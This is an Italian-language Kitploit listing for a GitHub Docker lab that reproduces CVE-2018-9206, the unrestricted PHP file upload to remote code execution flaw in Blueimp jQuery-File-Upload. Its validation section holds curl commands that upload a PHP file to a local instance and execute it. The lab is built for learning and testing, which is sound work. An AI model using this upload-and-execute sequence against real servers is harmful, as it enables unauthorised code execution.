Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2018-9206-jquery-file-upload — # Ambiente di laboratorio basato su Docker per CVE-2018-9206 (Blueimp jQuery-File-Upload caricamento file senza restrizioni verso RCE) con script PoC e comandi di validazione. | Kitploit
Strumenti/GitHubGitHub/flame-11/cve-2018-9206-jquery-file-upload
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubflame-11/cve-2018-9206-jquery-file-upload

CVE-2018-9206-jquery-file-upload

# Ambiente di laboratorio basato su Docker per CVE-2018-9206 (Blueimp jQuery-File-Upload caricamento file senza restrizioni verso RCE) con script PoC e comandi di validazione.

Vedi Repository
169 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2018-9206 - Blueimp jQuery-File-Upload Lab

Ambiente Docker vulnerabile per CVE-2018-9206 - Caricamento file senza restrizioni in Blueimp jQuery-File-Upload <= 9.22.0.

Avvio rapido

docker compose up -d --build

App disponibile all'indirizzo: http://localhost:8888/jQuery-File-Upload/

Validazione

# Upload a PHP file
curl -X POST "http://localhost:8888/jQuery-File-Upload/server/php/index.php" \
  -F 'files[]=@/dev/stdin;filename=test.php' <<< '<?php echo "CVE-2018-9206-PWNED"; ?>'

# Execute it
curl "http://localhost:8888/jQuery-File-Upload/server/php/files/test.php"
# Output: CVE-2018-9206-PWNED

Oppure esegui lo script PoC:

./scripts/poc.sh

Pulizia

docker compose down -v

Dettagli

CampoValore
CVECVE-2018-9206
ProdottoBlueimp jQuery-File-Upload
Versione9.22.0
TipoCaricamento file senza restrizioni → RCE
CVSS9.8 (Critico)

Riferimenti

  • https://nvd.nist.gov/vuln/detail/CVE-2018-9206
  • http://www.vapidlabs.com/advisory.php?v=204
  • https://www.exploit-db.com/exploits/45790/
Scarica lo strumento